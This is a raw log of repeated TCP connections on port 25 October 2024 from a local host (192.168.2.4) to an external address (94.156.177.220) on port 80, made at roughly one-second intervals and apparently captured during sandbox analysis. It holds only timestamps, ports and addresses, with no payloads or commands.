Oct 25, 2024 10:20:16.867280006 CEST	49744	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:16.872728109 CEST	80	49744	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:16.872788906 CEST	49744	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:16.878238916 CEST	80	49744	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:17.832015991 CEST	80	49744	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:17.832439899 CEST	49744	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:17.838629007 CEST	80	49744	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:17.838702917 CEST	49744	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:18.176420927 CEST	49747	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:18.181806087 CEST	80	49747	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:18.181890011 CEST	49747	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:18.199476957 CEST	49747	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:18.204986095 CEST	80	49747	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:18.205156088 CEST	49747	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:18.210448980 CEST	80	49747	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:19.151099920 CEST	80	49747	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:19.151355028 CEST	49747	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:19.157444000 CEST	80	49747	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:19.157531023 CEST	49747	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:19.295753002 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:19.301381111 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:19.301480055 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:19.303529024 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:19.310348988 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:19.310463905 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:19.318404913 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.110606909 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.110799074 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.112565994 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.112579107 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.112629890 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.113428116 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.113507986 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.250371933 CEST	49751	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.363428116 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.363555908 CEST	49749	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.370598078 CEST	80	49749	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.372490883 CEST	80	49751	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.372589111 CEST	49751	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.374851942 CEST	49751	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.380268097 CEST	80	49751	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:21.380407095 CEST	49751	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:21.385782957 CEST	80	49751	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:22.348746061 CEST	80	49751	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:22.349091053 CEST	49751	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:22.355060101 CEST	80	49751	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:22.355151892 CEST	49751	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:22.535537004 CEST	49752	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:22.541099072 CEST	80	49752	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:22.541291952 CEST	49752	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:22.543530941 CEST	49752	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:22.549330950 CEST	80	49752	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:22.549457073 CEST	49752	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:22.558542967 CEST	80	49752	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:23.506381989 CEST	80	49752	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:23.513082027 CEST	49752	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:23.520664930 CEST	80	49752	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:23.520863056 CEST	49752	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:23.669429064 CEST	49753	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:23.674985886 CEST	80	49753	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:23.675244093 CEST	49753	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:23.678324938 CEST	49753	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:23.683993101 CEST	80	49753	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:23.684072971 CEST	49753	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:23.689537048 CEST	80	49753	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:24.651226044 CEST	80	49753	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:24.651338100 CEST	49753	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:24.657496929 CEST	80	49753	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:24.657556057 CEST	49753	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:24.803309917 CEST	49754	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:24.808927059 CEST	80	49754	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:24.809022903 CEST	49754	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:24.811218977 CEST	49754	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:24.816596031 CEST	80	49754	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:24.816659927 CEST	49754	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:24.822199106 CEST	80	49754	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:25.785826921 CEST	80	49754	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:25.786050081 CEST	49754	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:25.792078972 CEST	80	49754	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:25.792182922 CEST	49754	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:25.951618910 CEST	49755	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:25.957355976 CEST	80	49755	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:25.957529068 CEST	49755	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:25.959554911 CEST	49755	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:25.965070009 CEST	80	49755	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:25.965151072 CEST	49755	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:25.971002102 CEST	80	49755	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:26.942964077 CEST	80	49755	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:26.954108000 CEST	49755	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:26.959979057 CEST	80	49755	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:26.960083961 CEST	49755	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:27.513991117 CEST	49756	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:27.710156918 CEST	80	49756	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:27.710342884 CEST	49756	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:27.712598085 CEST	49756	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:27.717895031 CEST	80	49756	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:27.717962980 CEST	49756	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:27.723520994 CEST	80	49756	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:28.695118904 CEST	80	49756	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:28.695329905 CEST	49756	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:28.701324940 CEST	80	49756	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:28.701385975 CEST	49756	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:28.847047091 CEST	49757	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:29.852535009 CEST	80	49757	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:29.852850914 CEST	49757	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:29.857386112 CEST	49757	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:29.863399029 CEST	80	49757	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:29.863609076 CEST	49757	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:29.869060040 CEST	80	49757	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:30.839289904 CEST	80	49757	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:30.839601040 CEST	49757	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:30.845453978 CEST	80	49757	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:30.845530033 CEST	49757	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:30.982709885 CEST	49758	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:30.988785982 CEST	80	49758	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:30.988944054 CEST	49758	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:30.991204977 CEST	49758	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:30.997298956 CEST	80	49758	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:30.997406006 CEST	49758	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:31.004072905 CEST	80	49758	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:32.009637117 CEST	80	49758	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:32.009820938 CEST	49758	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:32.016206980 CEST	80	49758	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:32.016299963 CEST	49758	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:32.161623001 CEST	49759	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:32.167093992 CEST	80	49759	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:32.167236090 CEST	49759	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:32.170057058 CEST	49759	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:32.176238060 CEST	80	49759	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:32.176321983 CEST	49759	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:32.182918072 CEST	80	49759	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:33.137624025 CEST	80	49759	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:33.139480114 CEST	49759	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:33.145709038 CEST	80	49759	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:33.145797014 CEST	49759	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:33.674559116 CEST	49760	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:33.680007935 CEST	80	49760	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:33.680114985 CEST	49760	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:33.682240009 CEST	49760	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:33.687712908 CEST	80	49760	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:33.687798977 CEST	49760	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:33.693196058 CEST	80	49760	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:34.643838882 CEST	80	49760	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:34.649765968 CEST	49760	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:34.655827045 CEST	80	49760	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:34.655885935 CEST	49760	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:34.796428919 CEST	49761	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:34.802263975 CEST	80	49761	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:34.802380085 CEST	49761	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:34.804533958 CEST	49761	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:34.810173988 CEST	80	49761	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:34.810261011 CEST	49761	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:34.815723896 CEST	80	49761	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:35.764405012 CEST	80	49761	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:35.764612913 CEST	49761	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:35.772022009 CEST	80	49761	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:35.772129059 CEST	49761	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:35.903042078 CEST	49762	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:35.908668041 CEST	80	49762	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:35.908893108 CEST	49762	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:35.911026955 CEST	49762	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:35.916702986 CEST	80	49762	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:35.916781902 CEST	49762	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:35.922312021 CEST	80	49762	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:36.884356022 CEST	80	49762	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:36.884486914 CEST	49762	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:36.891187906 CEST	80	49762	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:36.891268969 CEST	49762	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:37.032784939 CEST	49763	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:37.038342953 CEST	80	49763	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:37.038460970 CEST	49763	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:37.040622950 CEST	49763	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:37.046211958 CEST	80	49763	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:37.046303034 CEST	49763	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:37.051732063 CEST	80	49763	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:38.036004066 CEST	80	49763	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:38.036103010 CEST	49763	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:38.041870117 CEST	80	49763	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:38.041938066 CEST	49763	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:38.187341928 CEST	49764	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:38.192893982 CEST	80	49764	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:38.193017006 CEST	49764	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:38.195120096 CEST	49764	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:38.200429916 CEST	80	49764	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:38.200499058 CEST	49764	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:38.207500935 CEST	80	49764	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:39.179270029 CEST	80	49764	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:39.182220936 CEST	49764	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:39.188081980 CEST	80	49764	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:39.188141108 CEST	49764	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:39.808393955 CEST	49765	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:39.814313889 CEST	80	49765	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:39.814440966 CEST	49765	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:39.816567898 CEST	49765	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:39.822135925 CEST	80	49765	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:39.822242975 CEST	49765	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:39.828455925 CEST	80	49765	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:40.795761108 CEST	80	49765	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:40.795929909 CEST	49765	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:40.802577019 CEST	80	49765	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:40.802664042 CEST	49765	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:40.937027931 CEST	49766	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:40.942778111 CEST	80	49766	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:40.943032980 CEST	49766	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:40.945086002 CEST	49766	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:40.950526953 CEST	80	49766	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:40.950582981 CEST	49766	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:40.956342936 CEST	80	49766	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:42.075862885 CEST	80	49766	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:42.080956936 CEST	49766	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:42.081150055 CEST	80	49766	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:42.081222057 CEST	49766	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:42.086685896 CEST	80	49766	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:42.419420958 CEST	49767	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:42.425354958 CEST	80	49767	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:42.425493002 CEST	49767	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:42.429171085 CEST	49767	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:42.434514046 CEST	80	49767	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:42.434571028 CEST	49767	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:42.440943956 CEST	80	49767	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:43.413599014 CEST	80	49767	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:43.413726091 CEST	49767	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:43.419600010 CEST	80	49767	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:43.419670105 CEST	49767	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:43.561995983 CEST	49768	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:43.567883015 CEST	80	49768	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:43.568114042 CEST	49768	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:43.570328951 CEST	49768	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:43.575947046 CEST	80	49768	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:43.576011896 CEST	49768	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:43.581423044 CEST	80	49768	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:44.566714048 CEST	80	49768	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:44.566821098 CEST	49768	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:44.573606968 CEST	80	49768	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:44.573669910 CEST	49768	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:44.734644890 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:44.741476059 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:44.741709948 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:44.747003078 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:44.753571033 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:44.753726006 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:44.759124994 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.718827009 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.730458021 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.953665972 CEST	49770	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.954001904 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.954097033 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.954134941 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.954185009 CEST	49769	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.955579042 CEST	80	49769	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.959616899 CEST	80	49770	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.959847927 CEST	49770	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.962044954 CEST	49770	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.967685938 CEST	80	49770	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:45.967782974 CEST	49770	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:45.973774910 CEST	80	49770	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:46.934838057 CEST	80	49770	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:46.935091972 CEST	49770	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:46.940954924 CEST	80	49770	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:46.941023111 CEST	49770	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:47.076201916 CEST	49771	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:47.082467079 CEST	80	49771	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:47.082580090 CEST	49771	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:47.084693909 CEST	49771	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:47.090531111 CEST	80	49771	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:47.090625048 CEST	49771	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:47.096118927 CEST	80	49771	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:48.041701078 CEST	80	49771	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:48.041945934 CEST	49771	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:48.048667908 CEST	80	49771	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:48.048774958 CEST	49771	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:48.325642109 CEST	49772	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:48.331231117 CEST	80	49772	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:48.331362009 CEST	49772	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:48.360626936 CEST	49772	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:48.628634930 CEST	80	49772	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:48.628753901 CEST	49772	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:48.634532928 CEST	80	49772	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:49.291296959 CEST	80	49772	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:49.291568041 CEST	49772	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:49.297261953 CEST	80	49772	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:49.297353983 CEST	49772	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:49.437522888 CEST	49773	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:49.443141937 CEST	80	49773	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:49.443221092 CEST	49773	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:49.445259094 CEST	49773	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:49.450798988 CEST	80	49773	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:49.450869083 CEST	49773	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:49.456345081 CEST	80	49773	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:50.444104910 CEST	80	49773	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:50.444267035 CEST	49773	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:50.450429916 CEST	80	49773	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:50.450546980 CEST	49773	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:50.619322062 CEST	49774	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:50.624912977 CEST	80	49774	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:50.625000954 CEST	49774	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:50.627054930 CEST	49774	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:50.632441044 CEST	80	49774	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:50.632515907 CEST	49774	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:50.637970924 CEST	80	49774	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:51.601859093 CEST	80	49774	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:51.603399992 CEST	49774	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:51.609517097 CEST	80	49774	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:51.609622955 CEST	49774	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:52.015682936 CEST	49775	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:52.021224022 CEST	80	49775	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:52.021349907 CEST	49775	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:52.023469925 CEST	49775	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:52.029030085 CEST	80	49775	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:52.029076099 CEST	49775	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:52.034579992 CEST	80	49775	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:53.016560078 CEST	80	49775	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:53.016671896 CEST	49775	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:53.022732973 CEST	80	49775	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:53.022808075 CEST	49775	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:53.154604912 CEST	49776	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:53.160204887 CEST	80	49776	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:53.160307884 CEST	49776	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:53.162477970 CEST	49776	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:53.168273926 CEST	80	49776	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:53.168380022 CEST	49776	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:53.174129963 CEST	80	49776	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:54.132812977 CEST	80	49776	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:54.133033991 CEST	49776	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:54.139132023 CEST	80	49776	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:54.139240980 CEST	49776	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:54.291934013 CEST	49777	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:54.297348022 CEST	80	49777	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:54.297456026 CEST	49777	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:54.299670935 CEST	49777	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:54.305320978 CEST	80	49777	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:54.305428028 CEST	49777	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:54.311223030 CEST	80	49777	94.156.177.220	192.168.2.4
